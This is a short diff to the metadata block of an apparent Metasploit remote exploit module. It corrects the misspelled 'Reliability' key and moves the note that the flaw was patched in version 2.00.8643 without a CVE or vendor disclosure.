@@ -59,10 +59,10 @@ class MetasploitModule < Msf::Exploit::Remote
       ],
       'DefaultTarget'      => 1,
       'Notes'              => {
+        'NOCVE'            => 'Patched in 2.00.8643 without vendor disclosure',
         'Stability'        => [CRASH_SAFE],
         'SideEffects'      => [ARTIFACTS_ON_DISK],
-        'Reliablity'       => [REPEATABLE_SESSION],
-        'NOCVE'            => 'Patched in 2.00.8643'
+        'Reliability'      => [REPEATABLE_SESSION]
       }
     ))
 
